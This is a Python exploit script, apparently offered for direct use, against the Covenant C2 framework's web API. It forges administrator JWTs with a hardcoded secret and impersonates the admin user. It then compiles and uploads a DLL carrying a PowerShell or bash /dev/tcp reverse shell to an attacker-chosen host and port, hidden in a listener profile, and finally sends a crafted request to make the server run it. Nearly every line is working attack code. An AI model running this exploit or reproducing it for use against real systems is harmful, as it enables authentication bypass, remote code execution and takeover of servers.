import jwt
import json
import warnings
import base64
import re
import random
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from Crypto.Hash import HMAC, SHA256
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
from requests import request
from subprocess import run
from pwn import remote, context
from os import remove, urandom
from shutil import which
from urllib.parse import urlparse
from pathlib import Path
from time import time
def check_requirements():
if which("mcs") is None:
print("Please install the mono framework in order to compile the payload.")
print("https://www.mono-project.com/download/stable/")
exit(-1)
def random_hex(length):
alphabet = "0123456789abcdef"
return ''.join(random.choice(alphabet) for _ in range(length))
def request_api(method, token, route, body=""):
warnings.simplefilter('ignore', InsecureRequestWarning)
return request(
method,
f"{args.target}/api/{route}",
json=body,
headers={
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
},
verify=False
)
def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):
secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'
payload_data = {
"sub": username,
"jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
"User",
"Administrator"
],
"exp": int(time()) + 360,
"iss": "Covenant",
"aud": "Covenant"
}
token = jwt.encode(payload_data, secret_key, algorithm='HS256')
return token
def get_id_admin(token, json_roles):
id_admin = ""
for role in json_roles:
if role["name"] == "Administrator":
id_admin = role["id"]
print(f"\t[*] Found the admin group id : {id_admin}")
break
else:
print("\t[!] Did not found admin group id, quitting !")
exit(-1)
id_admin_user = ""
json_users_roles = request_api("get", token, f"users/roles").json()
for user_role in json_users_roles:
if user_role["roleId"] == id_admin:
id_admin_user = user_role["userId"]
print(f"\t[*] Found the admin user id : {id_admin_user}")
break
else:
print("\t[!] Did not found admin id, quitting !")
exit(-1)
json_users = request_api("get", token, f"users").json()
for user in json_users:
if user["id"] == id_admin_user:
username_admin = user["userName"]
print(f"\t[*] Found the admin username : {username_admin}")
return username_admin, id_admin_user
else:
print("\t[!] Did not found admin username, quitting !")
exit(-1)
def compile_payload():
if args.os == "windows":
payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'
else:
payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'
dll = """using System;
using System.Reflection;
namespace ExampleDLL{
public class Class1{
public Class1(){
}
public void Main(string[] args){
System.Diagnostics.Process.Start(""" + payload + """);
}
}
}
"""
temp_dll_path = f"/tmp/{random_hex(8)}"
Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())
print(f"\t[*] Writing payload in {temp_dll_path}.cs")
compilo_path = which("mcs")
compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])
if compilation.returncode:
print("\t[!] Error when compiling DLL, quitting !")
exit(-1)
print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")
dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()
remove(temp_dll_path + ".cs")
remove(temp_dll_path + ".dll")
print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")
return dll_encoded
def generate_wrapper(dll_encoded):
wrapper = """public static class MessageTransform {
public static string Transform(byte[] bytes) {
try {
string assemblyBase64 = \"""" + dll_encoded + """\";
var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
var assembly = System.Reflection.Assembly.Load(assemblyBytes);
foreach (var type in assembly.GetTypes()) {
object instance = System.Activator.CreateInstance(type);
object[] args = new object[] { new string[] { \"\" } };
try {
type.GetMethod(\"Main\").Invoke(instance, args);
}
catch {}
}
}
catch {}
return System.Convert.ToBase64String(bytes);
}
public static byte[] Invert(string str) {
return System.Convert.FromBase64String(str);
}
}"""
return wrapper
def upload_profile(token, wrapper):
body = {
'httpUrls': [
'/en-us/index.html',
'/en-us/docs.html',
'/en-us/test.html'
],
'httpRequestHeaders': [
{'name': 'User-Agent',
'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '
'Safari/537.36'},
{'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}
],
'httpResponseHeaders': [
{'name': 'Server', 'value': 'Microsoft-IIS/7.5'}
],
'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',
'httpGetResponse': '{DATA}',
'httpPostResponse': '{DATA}',
'id': 0,
'name': random_hex(8),
'description': '',
'type': 'HTTP',
'messageTransform': wrapper
}
response = request_api("post", token, "profiles/http", body)
if not response.ok:
print("\t[!] Failed to create the listener profile, quitting !")
exit(-1)
else:
profile_id = response.json().get('id')
print(f"\t[*] Profile created with id {profile_id}")
print("\t[*] Successfully created the listener profile")
return profile_id
def generate_valid_listener_port(impersonate_token, tries=0):
if tries >= 10:
print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")
exit(-1)
port = random.randint(8000, 8250)# TO BE EDITED WITH YOUR TARGET LISTENER PORT
listeners = request_api("get", impersonate_token, "listeners").json()
port_used = []
for listener in listeners:
port_used.append(listener["bindPort"])
if port in port_used:
print(f"\t[!] Port {port} is already taken by another listener, retrying !")
generate_valid_listener_port(impersonate_token, tries + 1)
else:
print(f"\t[*] Port {port} seems free")
return port
def get_id_listener_type(impersonate_token, listener_name):
response = request_api("get", impersonate_token, "listeners/types")
if not response.ok:
print("\t[!] Failed to get the listener type, quitting !")
exit(-1)
else:
for listener_type in response.json():
if listener_type["name"] == listener_name:
print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')
return listener_type["id"]
def generate_listener(impersonate_token, profile_id):
listener_port = generate_valid_listener_port(impersonate_token)
listener_name = random_hex(8)
data = {
'useSSL': False,
'urls': [
f"http://0.0.0.0:{listener_port}"
],
'id': 0,
'name': listener_name,
'bindAddress': "0.0.0.0",
'bindPort': listener_port,
'connectAddresses': [
"0.0.0.0"
],
'connectPort': listener_port,
'profileId': profile_id,
'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),
'status': 'Active'
}
response = request_api("post", impersonate_token, "listeners/http", data)
if not response.ok:
print("\t[!] Failed to create the listener, quitting !")
exit(-1)
else:
print("\t[*] Successfully created the listener")
listener_id = response.json().get("id")
return listener_id, listener_port
def create_grunt(impersonate_token, data):
stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]
if stager_code == "":
stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]
if stager_code == "":
print("\t[!] Failed to create the grunt payload, quitting !")
exit(-1)
print("\t[*] Successfully created the grunt payload")
return stager_code
def get_grunt_config(impersonate_token, listener_id):
data = {
'id': 0,
'listenerId': listener_id,
'implantTemplateId': 1,
'name': 'Binary',
'description': 'Uses a generated .NET Framework binary to launch a Grunt.',
'type': 'binary',
'dotNetVersion': 'Net35',
'runtimeIdentifier': 'win_x64',
'validateCert': True,
'useCertPinning': True,
'smbPipeName': 'string',
'delay': 0,
'jitterPercent': 0,
'connectAttempts': 0,
'launcherString': 'GruntHTTP.exe',
'outputKind': 'consoleApplication',
'compressStager': False
}
stager_code = create_grunt(impersonate_token, data)
aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)
guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)
if not aes_key or not guid_prefix:
print("\t[!] Failed to retrieve the grunt configuration, quitting !")
exit(-1)
aes_key = aes_key.group(1)
guid_prefix = guid_prefix.group(1)
print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")
return aes_key, guid_prefix
def aes256_cbc_encrypt(key, message):
iv_bytes = urandom(16)
key_decoded = base64.b64decode(key)
encoded_message = pad(message.encode(), 16)
cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)
encrypted = cipher.encrypt(encoded_message)
hmac = HMAC.new(key_decoded, digestmod=SHA256)
signature = hmac.update(encrypted).digest()
return encrypted, iv_bytes, signature
def trigger_exploit(listener_port, aes_key, guid):
message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)
data = {
"GUID": guid,
"Type": 0,
"Meta": '',
"IV": base64.b64encode(iv).decode(),
"EncryptedMessage": base64.b64encode(ciphered).decode(),
"HMAC": base64.b64encode(signature).decode()
}
json_data = json.dumps(data).encode("utf-8")
payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"
if send_exploit(listener_port, "Cookie", guid, payload):
print("\t[*] Exploit succeeded, check listener")
else :
print("\t[!] Exploit failed, retrying")
if send_exploit(listener_port, "Cookies", guid, payload):
print("\t[*] Exploit succeeded, check listener")
else:
print("\t[!] Exploit failed, quitting")
def send_exploit(listener_port, header_cookie, guid, payload):
context.log_level = 'error'
request = f"""POST /en-us/test.html HTTP/1.1\r
Host: {IP_TARGET}:{listener_port}\r
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r
{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r
Content-Type: application/x-www-form-urlencoded\r
Content-Length: {len(payload)}\r
\r
{payload}
""".encode()
sock = remote(IP_TARGET, listener_port)
sock.sendline(request)
response = sock.recv().decode()
sock.close()
if "HTTP/1.1 200 OK" in response:
return True
else:
return False
if __name__ == "__main__":
check_requirements()
parser = argparse.ArgumentParser()
parser.add_argument("target",
help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")
parser.add_argument("os",
help="Operating System of the target",
choices=["windows", "linux"])
parser.add_argument("lhost",
help="IP of the machine that will receive the reverse shell")
parser.add_argument("lport",
help="Port of the machine that will receive the reverse shell")
args = parser.parse_args()
IP_TARGET = urlparse(args.target).hostname
print("[*] Getting the admin info")
sacrificial_token = craft_jwt("xThaz")
roles = request_api("get", sacrificial_token, "roles").json()
admin_username, admin_id = get_id_admin(sacrificial_token, roles)
impersonate_token = craft_jwt(admin_username, admin_id)
print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")
print("[*] Generating payload")
dll_encoded = compile_payload()
wrapper = generate_wrapper(dll_encoded)
print("[*] Uploading malicious listener profile")
profile_id = upload_profile(impersonate_token, wrapper)
print("[*] Generating listener")
listener_id, listener_port = generate_listener(impersonate_token, profile_id)
print("[*] Triggering the exploit")
aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)
trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")